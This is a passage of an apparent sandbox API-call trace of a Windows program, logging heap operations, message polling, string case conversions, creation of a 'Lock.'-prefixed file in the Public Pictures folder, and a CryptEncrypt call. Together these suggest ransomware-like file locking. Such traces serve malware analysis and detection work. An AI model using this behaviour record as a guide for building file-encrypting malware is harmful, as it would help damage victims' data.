hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0268.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.003] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0268.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0268.004] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.004] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.004] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.004] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.004] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/Sample Pictures" (normalized: "c:\\users\\public\\pictures\\sample pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0268.004] GetLastError () returned 0x5 [0268.005] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.005] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.005] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0268.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.005] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/Lock.Sample Pictures" (normalized: "c:\\users\\public\\pictures\\lock.sample pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0268.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0268.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0268.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.008] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0268.008] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.008] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0268.009] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0268.009] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0268.009] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0268.009] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.009] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.009] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.009] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.010] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.010] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0268.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.010] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.011] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.011] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.011] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.011] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0268.011] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.011] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.011] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0268.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0268.012] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.012] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.012] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0268.012] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0268.013] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.013] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0268.014] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.014] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0268.014] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.014] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.014] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0268.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0268.015] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0268.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0268.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0268.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0268.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0268.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 